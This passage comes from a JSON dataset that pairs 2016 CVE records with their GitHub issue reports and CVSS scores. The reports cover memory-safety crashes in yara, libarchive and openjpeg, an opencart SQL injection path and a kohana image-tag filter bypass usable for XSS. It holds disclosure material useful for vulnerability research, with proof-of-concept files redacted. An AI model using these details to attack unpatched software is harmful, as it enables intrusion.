        "description": "SIGSEGV in APITAG APITAG SIGSEGV in APITAG APITAG Tested on Git HEAD: APITAG Payload: URLTAG To reproduce: APITAG ASAN Output: ERRORTAG APITAG NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10210",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/576",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/576",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2016-12-06T09:18:57Z",
        "description": "Null Pointer Dereference in APITAG Null Pointer Dereference in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10211",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/575",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/575",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2016-12-06T09:15:26Z",
        "description": "Use After Free in APITAG Use After Free in APITAG Tested on latest Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10216",
        "Issue_Url_old": "https://github.com/sivann/itdb/issues/56",
        "Issue_Url_new": "https://github.com/sivann/itdb/issues/56",
        "Repo_new": "sivann/itdb",
        "Issue_Created_At": "2016-11-28T07:01:45Z",
        "description": "itdb NUMBERTAG Cross Site Scripting (XSS). APITAG itdb NUMBERTAG Cross Site Scripting APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10252",
        "Issue_Url_old": "https://github.com/Opendigitalradio/ODR-PadEnc/issues/2",
        "Issue_Url_new": "https://github.com/opendigitalradio/odr-padenc/issues/2",
        "Repo_new": "opendigitalradio/odr-padenc",
        "Issue_Created_At": "2017-03-07T18:13:36Z",
        "description": "Memory leak. I have found out a memory leak in ODR APITAG NUMBERTAG FILETAG I have a multiplexer where I run NUMBERTAG instances of odr padenc. They are executed as the following CODETAG PATHTAG contains only one PNG image and is not updated. I have noticed that at some point I stopped having log messages from padenc but process keeps running. When I did APITAG there were some data NUMBERTAG screens on terminal).",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10321",
        "Issue_Url_old": "https://github.com/web2py/web2py/issues/1585",
        "Issue_Url_new": "https://github.com/web2py/web2py/issues/1585",
        "Repo_new": "web2py/web2py",
        "Issue_Created_At": "2017-03-05T02:29:48Z",
        "description": "CVETAG , CVETAG , CVETAG . Hello, several security vulnerabilities were reported for web2py and they already got CVEs assigned. I could not find any information about them in your git repository. Are you aware of them and are there any fixes available? URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10349",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/834",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/834",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-12-06T11:04:14Z",
        "description": "heap buffer overflow in archive_le NUMBERTAG dec. On NUMBERTAG ERRORTAG Testcase: URLTAG Could you check if it a duplicate of NUMBERTAG or a similar bug?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10350",
        "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/835",
        "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/835",
        "Repo_new": "libarchive/libarchive",
        "Issue_Created_At": "2016-12-06T11:07:26Z",
        "description": "heap buffer overflow in APITAG On NUMBERTAG ERRORTAG Testcase: URLTAG Could you check if it a duplicate of NUMBERTAG or a similar bug?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10351",
        "Issue_Url_old": "https://github.com/telegramdesktop/tdesktop/issues/2666",
        "Issue_Url_new": "https://github.com/telegramdesktop/tdesktop/issues/2666",
        "Repo_new": "telegramdesktop/tdesktop",
        "Issue_Created_At": "2016-11-23T14:51:44Z",
        "description": "set better permission on APITAG Hello, by default the APITAG directory has NUMBERTAG APITAG I think would be great set it to NUMBERTAG or NUMBERTAG While the main homedir has NUMBERTAG and it happens by default here), a local user can obtain the contents of APITAG I did not investigate what a local user which obtain those files can eventually steal. Thanks.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-10375",
        "Issue_Url_old": "https://github.com/fbb-git/yodl/issues/1",
        "Issue_Url_new": "https://github.com/fbb-git/yodl/issues/1",
        "Repo_new": "fbb-git/yodl",
        "Issue_Created_At": "2016-02-04T06:33:18Z",
        "description": "invalid memory read in queuepush.c / function APITAG Compiling yodl with address sanitizer ( fsanitize=address) shows an invalid memory read in the function APITAG I tried to look at the source and find the bug, but I'm not familiar with the code base and was unable to easily determine the reason. This can be reproduced simply by trying to compile everything with address sanitizer enabled: CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build programs CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build macros CFLAGS=\" fsanitize=address g\" LDFLAGS=\" fsanitize=address\" ./build man This was tested with release NUMBERTAG The error message from address sanitizer NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG ee NUMBERTAG at pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG bc0 sp NUMBERTAG ffe NUMBERTAG bb0 READ of size NUMBERTAG at NUMBERTAG ee NUMBERTAG thread T NUMBERTAG d NUMBERTAG in queue_push PATHTAG NUMBERTAG d in lexer_push_str PATHTAG NUMBERTAG c6b0 in p_expand_macro PATHTAG NUMBERTAG c0d7 in p_default_symbol PATHTAG NUMBERTAG b3 in p_handle_default_symbol PATHTAG NUMBERTAG dd NUMBERTAG in p_parse PATHTAG NUMBERTAG cbe6 in parser_process PATHTAG NUMBERTAG e5a in main PATHTAG NUMBERTAG f0ed NUMBERTAG d NUMBERTAG f in __libc_start_main APITAG NUMBERTAG e NUMBERTAG in _start ( PATHTAG NUMBERTAG efd7 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f0ed5aab7d7 in malloc ( PATHTAG NUMBERTAG c4b in n_malloc PATHTAG NUMBERTAG in new_memory PATHTAG NUMBERTAG e1 in queue_construct PATHTAG NUMBERTAG b in l_media_construct_memory PATHTAG NUMBERTAG a8 in l_push PATHTAG NUMBERTAG in lexer_push_str PATHTAG NUMBERTAG c6b0 in p_expand_macro PATHTAG NUMBERTAG c0d7 in p_default_symbol PATHTAG NUMBERTAG b3 in p_handle_default_symbol PATHTAG NUMBERTAG dd NUMBERTAG in p_parse PATHTAG NUMBERTAG cbe6 in parser_process PATHTAG NUMBERTAG e5a in main PATHTAG NUMBERTAG f0ed NUMBERTAG d NUMBERTAG f in __libc_start_main APITAG SUMMARY: APITAG unknown crash PATHTAG queue_push Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9da0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9db0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd NUMBERTAG c NUMBERTAG fff9de NUMBERTAG c NUMBERTAG fff9df NUMBERTAG fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-10504",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/835",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/835",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-09-13T10:13:45Z",
        "description": "Out of Bounds Write in opj_mqc_byteout of mqc.c. DESCRIPTION ============== An Out of Bounds Write issue can be occurred in function opj_mqc_byteout of mqc.c during executing opj_compress . This issue was caused by a malformed BMP file. CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . TESTED VERSION ============== Master version of APITAG NUMBERTAG f, PATHTAG ) EXCEPTION LOG ============== ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10505",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/792",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/792",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-06-28T02:15:25Z",
        "description": "Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c. Title Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10505",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/785",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/785",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-25T03:47:58Z",
        "description": "Null Pointer Access in function color_esycc_to_rgb of color.c. Title Null Pointer Access in function color_esycc_to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10505",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/784",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/784",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-25T03:47:12Z",
        "description": "Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c. Title Null Pointer Access in function sycc NUMBERTAG to_rgb of color.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10505",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/776",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/776",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-06T06:09:25Z",
        "description": "Null Pointer Access in function imagetopnm of convert.c. Title APITAG Null Pointer Access in function imagetopnm of convert.c Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10506",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/780",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/780",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-06T06:11:42Z",
        "description": "division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10506",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/779",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/779",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-06T06:11:12Z",
        "description": "division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_rpcl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10506",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/778",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/778",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-06T06:10:50Z",
        "description": "division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10506",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/777",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/777",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-05-06T06:10:19Z",
        "description": "division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Title division by zero in function opj_pi_next_pcrl of pi.c (line NUMBERTAG Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information ERRORTAG APITAG FILETAG Credit Ke Liu of Tencent's Xuanwu LAB",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10506",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/732",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/732",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-03-28T08:55:53Z",
        "description": "division by zero (SIGFPE) error in opj_pi_next_cprl function in (line NUMBERTAG of pi.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG j2k Starting program: PATHTAG o image.pgm i crashes NUMBERTAG j2k Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb8d NUMBERTAG in opj_pi_next_cprl (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG if (!((pi >x % (OPJ_INT NUMBERTAG comp >dx APITAG x == pi >t NUMBERTAG tr NUMBERTAG APITAG d NUMBERTAG gdb) p rp NUMBERTAG gdb) bt NUMBERTAG b7fb8d NUMBERTAG in opj_pi_next_cprl (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG b7fbc4cc in opj_pi_next (pi NUMBERTAG ec0) at PATHTAG NUMBERTAG b7fc0b8d in opj_t2_decode_packets (p_t NUMBERTAG p_tile_no NUMBERTAG p_tile NUMBERTAG d0, p_src NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_len NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG in opj_tcd_t2_decode (p_tcd NUMBERTAG p_src_data NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_src_size NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc5d NUMBERTAG in opj_tcd_decode_tile (p_tcd NUMBERTAG p_src NUMBERTAG d8 PATHTAG p_max_length NUMBERTAG p_tile_no NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG a in opj_j2k_decode_tile (p_j2k NUMBERTAG p_tile_inde NUMBERTAG p_data NUMBERTAG c8 \"\", p_data_size NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG cc0) at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of comp >dx is NUMBERTAG and the value of rpx is NUMBERTAG The value evaluated from (OPJ_INT NUMBERTAG comp >dx APITAG x%(OPJ_INT NUMBERTAG comp >dx<<rpx) will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a j2k file to generate the APITAG APITAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10506",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/731",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/731",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-03-28T08:54:54Z",
        "description": "division by zero (SIGFPE) error in opj_pi_next_cprl function (line NUMBERTAG of pi.c). Testing Environment Ubuntu + APITAG APITAG master, PATHTAG ) Exception Information PATHTAG gdb opj_decompress q Reading symbols from APITAG (gdb) r o image.pgm i crashes NUMBERTAG j2k Starting program: PATHTAG o image.pgm i crashes NUMBERTAG j2k Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7fb8ca1 in opj_pi_next_cprl (pi NUMBERTAG d8) at PATHTAG NUMBERTAG if (!((pi >y % (OPJ_INT NUMBERTAG comp >dy APITAG y == pi >ty0) && ((try0 APITAG dy NUMBERTAG gdb) bt NUMBERTAG b7fb8ca1 in opj_pi_next_cprl (pi NUMBERTAG d8) at PATHTAG NUMBERTAG b7fbc4cc in opj_pi_next (pi NUMBERTAG d8) at PATHTAG NUMBERTAG b7fc0b8d in opj_t2_decode_packets (p_t NUMBERTAG a NUMBERTAG p_tile_no NUMBERTAG p_tile NUMBERTAG d0, p_src NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_len NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc NUMBERTAG in opj_tcd_t2_decode (p_tcd NUMBERTAG p_src_data NUMBERTAG d8 PATHTAG p_data_read NUMBERTAG bfff9dec, p_max_src_size NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fc5d NUMBERTAG in opj_tcd_decode_tile (p_tcd NUMBERTAG p_src NUMBERTAG d8 PATHTAG p_max_length NUMBERTAG p_tile_no NUMBERTAG p_cstr_inde NUMBERTAG d NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG a in opj_j2k_decode_tile (p_j2k NUMBERTAG p_tile_inde NUMBERTAG p_data NUMBERTAG c8 \"\", p_data_size NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fac NUMBERTAG in opj_j2k_decode_tiles (p_j2k NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fa NUMBERTAG e in opj_j2k_exec (p_j2k NUMBERTAG p_procedure_list NUMBERTAG p_stream NUMBERTAG p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7facaf9 in opj_j2k_decode (p_j2k NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb1aad in opj_jp2_decode (jp NUMBERTAG p_stream NUMBERTAG p_image NUMBERTAG cc0, p_manager NUMBERTAG e4) at PATHTAG NUMBERTAG b7fb6c NUMBERTAG in opj_decode (p_codec NUMBERTAG b8, p_stream NUMBERTAG p_image NUMBERTAG cc0) at PATHTAG NUMBERTAG c2c0 in main (argc NUMBERTAG arg NUMBERTAG bffff NUMBERTAG at PATHTAG Simple Analysis The value of comp >dy is NUMBERTAG and the value of rpy is NUMBERTAG The value evaluated from (OPJ_INT NUMBERTAG comp >dy APITAG y%(OPJ_INT NUMBERTAG comp >dy<<rpy) will cause a divide by zero exception (SIGFPE). Proof of Concept file Please decode the following content with base NUMBERTAG algorithm. Then you should save the decoded content to a j2k file to generate the APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG PATHTAG PATHTAG APITAG APITAG APITAG APITAG PATHTAG APITAG PATHTAG APITAG APITAG APITAG PATHTAG PATHTAG APITAG APITAG tJy NUMBERTAG fprv/Z Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10507",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/833",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/833",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-09-13T09:12:33Z",
        "description": "Out of Bounds Read in function bmp NUMBERTAG toimage of convertbmp.c. DESCRIPTION ============== An Out of Bounds Read issue was found in function bmp NUMBERTAG toimage of convertbmp.c. The root cause of this issue was an Integer Overflow issue. The opj_compress process may crash in other functions. CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . TESTED VERSION ============== Master version of APITAG NUMBERTAG f, PATHTAG ) EXCEPTION LOG ============== ERRORTAG ANALYSIS ============== The integer overflow issue exists in function bmptoimage. Here APITAG NUMBERTAG and APITAG NUMBERTAG and stride should equals NUMBERTAG APITAG But actually stride equals NUMBERTAG when overflow happened. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10509",
        "Issue_Url_old": "https://github.com/opencart/opencart/issues/4114",
        "Issue_Url_new": "https://github.com/opencart/opencart/issues/4114",
        "Repo_new": "opencart/opencart",
        "Issue_Created_At": "2016-03-14T09:58:52Z",
        "description": "Input not sanitized. Hi, I think I found a variable that's not sanitized and could lead to a SQL Injection or information disclosure. The source is APITAG $carrier = $this >request APITAG As I checked under APITAG documention Request class uses APITAG and encodes double quotes so it's still possible to use single quote right? Most of your database queries use APITAG to prevent that from happening. I found one that don't use escape before going to a SQL query. So we have this line: $carrier = $this >request APITAG (...) $this >model_openbay_amazon APITAG $carrier, $carrier_from_list, !empty($carrier) ? $this >request >post['tracking'][$order_id] : ''); After this it calls FILETAG file: public function APITAG $courier_id, $courier_from_list, $tracking_no) { $this >db >query(\" UPDATE APITAG SET APITAG = '\" . $courier_id . \"', APITAG = \" . (int)!$courier_from_list . \", APITAG = '\" . $tracking_no . \"' WHERE APITAG = \" . (int)$order_id . \"\"); } Because the single quote is not escaped and Query class uses single quote to delimiter possible SQL Injection in place. A possible solution is to use APITAG function on courier_id. I hope I'm not mistaken and feel free to give me your feedback. Best,",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2016-10510",
        "Issue_Url_old": "https://github.com/kohana/kohana/issues/107",
        "Issue_Url_new": "https://github.com/kohana/kohana/issues/107",
        "Repo_new": "kohana/kohana",
        "Issue_Created_At": "2016-05-18T17:29:05Z",
        "description": "Security::strip_image_tags bypass. Hi, I found a security issue on your latest version. In your security class \u2013 PATHTAG you have the following function to remove img tags from strings: ERRORTAG Just by looking at that regex it's possible to see that after <img it expects a space. So to bypass this you could use: <img/src... PHP example: ERRORTAG And it's still possible to inject a IMG on a string in this case with a XSS vector. Hope it helps. Best, David Sopas Checkmarx.com",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-10513",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/548",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/548",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2016-11-17T13:10:10Z",
        "description": "quick search and HTML comment. Sanitize quick search expression before sending it to HTML comment on frontend",
